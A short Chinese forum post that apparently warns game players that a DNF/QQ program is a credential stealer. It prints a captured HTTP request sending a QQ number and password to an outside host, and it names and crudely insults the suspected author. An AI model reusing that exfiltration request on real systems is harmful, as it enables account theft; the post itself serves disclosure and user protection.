这个程序经过分析
纯粹是个盗号程序
经过简单分析。程序使用VC++6.0编写
无dll,无sys文件。可疑。。
抓包分析
GET./dnf.asp?qqnumber=123123&qqpassword=123123----.............HTTP/1.1..Accept:.*/*..User-Agent:.Mozilla/4.0.(compatible;.MSIE.6.0;.Windows.NT.5.0)..Host:.wwl19910811.user.free.77169.net..Cache-Control:.no-cache..Cookie:.ASPSESSIONIDAQTRSSAR=ODABODHDLMJLMBNFGDDKGHGN....
以上---
测试帐号密码为
123123
123123
看到host地址:wwl19910811.user.free.77169.net
看到用户名:wwl19910811
user.free.77169.net : 著名的黑客网站
请百度 wwl19910811
以前好久没玩不知道。这个wwl19910811肯定还开过别的片人贴。。
斑竹看到请封他ip段。销毁他在猴子岛的所有帐号。并且问候他老母
注:此程序暂时未知是否带有后门,看样子壳都不加肯定也不会有什么后门。你用过后把密码改掉,然后把他那只有垃圾界面的狗屎软件删除就行了